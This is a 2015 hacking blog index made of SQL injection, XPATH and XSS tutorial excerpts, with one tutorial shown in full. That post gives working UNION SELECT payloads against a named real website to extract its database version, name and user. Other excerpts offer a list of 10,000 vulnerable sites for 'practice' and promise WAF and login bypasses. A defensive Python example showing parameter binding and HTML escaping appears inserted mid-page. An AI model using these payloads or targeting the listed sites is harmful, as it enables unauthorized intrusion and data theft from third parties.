
Saturday 5 September 2015

Bypassing Modern XSS WAF Filters


XSS (cross-site scripting) is a vulnerability that occurs when a web application fails to properly handle the user's input parameters as well as its own server response. An XSS attack allows an attacker to insert his malicious HTML code into the target website.
In the previous tutorials on XSS we learned some basics of the XSS attack and the use of XSS with SQL injection.

Tuesday 1 September 2015

XSS with SQL Injection



In the previous tutorial, Ultimate Guide to XSS (Cross Site Scripting), we covered the basics of XSS (cross-site scripting) and using its payloads on our target sites. In this tutorial you will learn the XSS attack via SQL injection.
If you are new to XSS, I suggest you first read the basics in the previous tutorial to learn how it works and what an attacker can do with an XSS vulnerability. Once you have the basic knowledge of the XSS attack, you will be better able to understand this tutorial, "XSS with SQL Injection".

Sunday 23 August 2015

Ultimate Guide to XSS (Cross Site Scripting)

Today I'm going to post a handy guide to XSS for newbies.
A lot of people have asked me to write some tutorials on XSS, so I've decided to cover XSS for them as well.

What is XSS ?

Everyone knows that XSS stands for cross-site scripting. XSS is one of the most common web application vulnerabilities and is increasingly popular at this time; it allows an attacker to submit his malicious queries or code in the target website's "search boxes" as well as in the target URL.

Friday 14 August 2015

Cookie Based Injection

In this tutorial you will learn how to inject a website through cookies.
The video tutorial is a step-by-step guide to injecting a website via cookies.

Monday 10 August 2015

10000 Fresh SQLi Vulnerable Websites List


10000 Fresh SQLi Vulnerable Websites 2015 List

Here are 10000 fresh SQLi vulnerable websites for practice. These vulnerable websites will help you polish your skills. You can use these sites to improve your SQLi skills, and for tutorials keep in touch with www.raijee1337.blogspot.com. You can also post your questions in the comments if you have any problem while injecting.

Thursday 6 August 2015

Alternative Ways For Counting Columns At One Request

Counting Columns At One Request
In this tutorial I'm going to discuss the ways of counting all columns in one request. Normally we use the ORDER BY command to count columns one by one, which takes time, and we are always looking for easier ways. This guide will help you in that case.
I will show you some of the best ways to count columns.

Monday 3 August 2015

Converting Syntax in Hex Value - SQLi Tips

Syntax in Hex Value
After a long time I'm back with another tutorial on SQL injection. In this tutorial we will discuss converting syntax to hex values. Many noobs like me don't know how hex values are used.
Sometimes during regular manual injection we come across sites where we can't get data from our SQLi command.

Wednesday 22 July 2015

MSSQL Union Based Injection Part-2 - Advanced Method

In our previous tutorials about MSSQL injection we covered the basics:
MSSQL UNION BASED INJECTION
MSSQL INJECTION USING CONVERT
MS-ACCESS INJECTION
In this tutorial you will learn some advanced methods that will help you in injecting.

Tuesday 21 July 2015

MSSQL Injection Using Convert

In our previous tutorial we discussed MSSQL Union Based Injection.
Now let's come to the next part. In this tutorial you will learn about injecting a site with the Convert attack.
How does this command actually work? It works between two data types: we give commands to the server with Convert, and it returns the specific data that we executed in the command.

Monday 20 July 2015

MS-Access Injection -Tutorial

In this tutorial you will learn how to inject into an MS Access database.
We will do our injection manually. First we have to check whether our target site is vulnerable, so we use the regular injection check and add a single quote ' at the end of the parameter.

Sunday 19 July 2015

MSSQL Union Based Injection -Step by Step Guide

In our previous tutorials we discussed MySQL and a lot of methods of injecting into a MySQL database. Now let's come to injecting an MSSQL database.
In this tutorial we will discuss MSSQL union based injection. MSSQL injection is similar to MySQL injection but not the same, as MySQL injection is easier than MSSQL injection.

Friday 17 July 2015

XPATH Injection in Login Panel

In our previous tutorial we discussed Bypassing Login Panel with SQL Queries.
But sometimes we find a SQL injection vulnerability in a login panel and, after executing SQL queries there, it doesn't give access to the login panel. In such cases we inject the login panel with XPATH injection and dump the admin details from the login panel.

Wednesday 15 July 2015

XPATH Injection Using UPDATEXML



After the discussion about XPATH Injection Using ExtractValue,
let's come to the next part. In this tutorial you will learn about XPATH injection using UPDATEXML.
Each site uses a different firewall to protect its database. On some sites the ExtractValue function is blocked but UPDATEXML can be used, so there we use XPATH injection with UPDATEXML.

Tuesday 14 July 2015

XPATH Injection Using Extractvalue


In this tutorial we will discuss XPATH injection using Extractvalue.
While injecting a site we come to the union based part. When we execute the union based query, we get an error message:
"The used SELECT statements have a different number of columns"
so there we use XPATH injection.

Sunday 12 July 2015

Bypassing Login Panel with SQL Queries




Bypassing Login Panel with SQL Queries Tutorial By RAi Jee
In this tutorial you will learn how to bypass a login panel with SQL injection queries.
We give our evil SQL queries in the admin panel, then the server filters our command and gives us access to the admin panel without any username or password.

Saturday 11 July 2015

Adding HTML Tags in SQL Queries

Adding HTML Tags in SQL Queries - Tutorial by RAi Jee
HTML tags can be used for a lot of fun in SQL queries. We can use HTML tags to make the output colourful. Sometimes when we are injecting a site the vulnerable column is in the title or in the page source, so we can also use HTML tags there to show the output on the page.
Let's start adding HTML tags to make the output colourful.
Here is an example. We want to print the version in red, so here is our HTML tag for showing the version in red:
 <font color=red>

Concat(OUR_HTML_TAG,QUERY_HERE)

Let's see the result. Before executing the query, first encode the HTML tag as a hex value, or put single quotes before and after the HTML tag, to make it executable.

http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version()),8,9--+

And you can see the version is in red. If we want to use different colors for each command, like displaying the version in red, the database in green and the user in blue, we use a different HTML tag for each task.
See the example.
Concat(Version RED Color ,Database in Green Color,User in Blue Color)
HTML tags for each task:
Red color: <font color=red>
Green color: <font color=green>
Blue color: <font color=blue>
So our final query for displaying each task in a different color will be:
Concat(<font color=red>,version(),<font color=green>,database(),<font color=blue>,user())
See the example.
http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version(),0x3a,'<font color=green>',database(),0x3a,'<font color=blue>',user()),8,9--+

As the picture shows, all tasks are complete. In this way you can also display tables and columns in different colors.
That covers displaying SQLi commands in different colors.
Now let's see how we can display data using HTML tags when our vulnerable column is in the page source or in the title.
When the vulnerable column is in the page source:
Concat(STARTING_HTML_TAG,OUR_QUERY,ENDING_HTML_TAG)
We use this HTML tag to display data on the page if our vulnerable column is in the page source.

HTML TAG:Concat(<font size="8" color="red">,Version(),</font>) 

Sometimes our vulnerable column is in the title, so in that case we use this HTML tag to print data on the web page:

HTML TAG:Concat(</title>,Version())

Use these HTML tags after encoding them as hex values, or put single quotes before and after the HTML tag, to make the query executable.
Happy Injecting !!
AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee
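
The tutorial above works only because the application does two things: it pastes the id parameter into the SQL text, and it writes column values into the page without encoding. The following added example (not code from the original post) shows both weak points beside their fixes, using an in-memory SQLite database as a stand-in for the MySQL backend; the events table, the function names and the SQLite-adapted sample input are assumptions.

```python
import html
import sqlite3

# Constructed input: the page's UNION/Concat payload shape, adapted to SQLite
# ('||' stands in for Concat(), sqlite_version() for version()).
PAYLOAD = "-444' UNION SELECT 1, '<font color=red>' || sqlite_version() -- "

def make_db():
    """In-memory stand-in for the table behind a page like event.php."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE events (id INTEGER, title TEXT)")  # hypothetical schema
    db.execute("INSERT INTO events VALUES (1, 'Board meeting')")
    return db

def titles_concat(db, event_id):
    """Vulnerable: the request value becomes part of the SQL text."""
    sql = "SELECT id, title FROM events WHERE id = '%s'" % event_id
    return [row[1] for row in db.execute(sql)]

def titles_bound(db, event_id):
    """Hardened: the value is bound as data and can never add a UNION branch."""
    sql = "SELECT id, title FROM events WHERE id = ?"
    return [row[1] for row in db.execute(sql, (event_id,))]

def render_raw(titles):
    """Vulnerable sink: column values are written into the page as markup."""
    return "".join("<li>%s</li>" % t for t in titles)

def render_escaped(titles):
    """Hardened sink: <, >, & and quotes are encoded, so tags (including a
    </title> breakout) arrive as visible text instead of markup."""
    return "".join("<li>%s</li>" % html.escape(str(t)) for t in titles)

if __name__ == "__main__":
    db = make_db()
    leaked = titles_concat(db, PAYLOAD)
    print("concatenated query :", render_raw(leaked))
    print("same rows, escaped :", render_escaped(leaked))
    print("bound parameter    :", titles_bound(db, PAYLOAD))
```

Binding the parameter removes the injection itself; output encoding is the second layer that keeps database content from being interpreted as HTML even when a row already contains markup.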

Friday 10 July 2015

Post Parameters Injection Through Live HTTP Headers

 Post Parameters Injection Through Live HTTP Headers - Tutorial By RAi Jee
In this tutorial you will learn how to inject a website through POST parameters with Live HTTP Headers.
First you need the Live HTTP Headers add-on installed in your browser. If you don't have this add-on, you can install it from this link.

Wednesday 8 July 2015

Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial


Bypassing Incorrect usage of UNION and ORDER BY -Tutorial By RAi Jee
In the previous tutorial we discussed
Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted.
Today's topic is how we can bypass the "Incorrect usage of UNION and ORDER BY" error.
So let's start our manual injection. Our target site is vulnerable to SQL injection.

Tuesday 7 July 2015

Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted -Tutorial



Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted


Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted -Tutorial By RAi Jee

In this tutorial you will learn how to bypass the error "Allowed memory size of XXXX bytes exhausted".

While injecting we come to a site which gives us the error "Allowed memory size of XXXX bytes exhausted" when we build our union based query.
This error occurs because PHP has no allowed memory left. There are a lot of possible causes, which you can find on our Chaachu Google.


Monday 15 June 2015

Bypassing illegal Mix of Collations- Tutorial






Bypassing illegal Mix of Collations- Tutorial by RAi Jee

We will continue our tutorials about SQL.
In this tutorial you will learn how to bypass illegal mix of collations.
Let's start with our regular SQL injection.


Friday 12 June 2015

Error Based Dump In One Shot - (DIOS)







Error Based Dump In One Shot (DIOS) - By RAi Jee

We discussed error based SQL injection in our previous tutorial.
In this tutorial you will learn how to build an error based Dump In One Shot (DIOS).
As we know, in an error based query we give our commands to the server and it gives us the result inside an error.


Wednesday 10 June 2015

Error Based Injection -Tutorial






 Error Based Injection -Tutorial BY RAi Jee
After union based injection, in this tutorial you will learn error based SQL injection.
How will you know that the target website needs error based injection?
Hmm, while we are injecting a site, we count the total number of columns and then build our union based SQL query.


Friday 29 May 2015

Base64 Encode/Decode SQL Injection




Base64 Encode/Decode SQL Injection By RAi Jee

Today our topic is Base64 encoded/decoded SQLi queries.

Here is an example of a Base64 parameter.


Wednesday 20 May 2015

Union Based SQL Injection (WAF Bypassing)

 
After our tutorials on the basics of SQL injection:
SQL Injection- Basics Of SQLi Part-1
SQL Injection- Basics Of SQLi Part-2

Union based SQL injection + WAF Bypassing By RAi Jee



Today I'm going to discuss union based SQL injection and WAF bypassing techniques.
Let's start injecting.


Tuesday 19 May 2015

SQL Injection- Basics Of SQLi Part-2


                    
SQL Injection- Basics Of SQLi Part-1

After reading my first tutorial on the basics of SQL injection, here is the next tutorial.

SQL Injection- Basics Of SQLi Part-2 By RAi Jee

Sunday 17 May 2015

SQL Injection- Basics Of SQLi Part-1



SQL Injection- Basics Of SQLi Part-1 By RAi Jee

SQL (Structured Query Language) injection is one of the most powerful methods of system penetration.

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The attacker sends his commands to the web application to dump the database.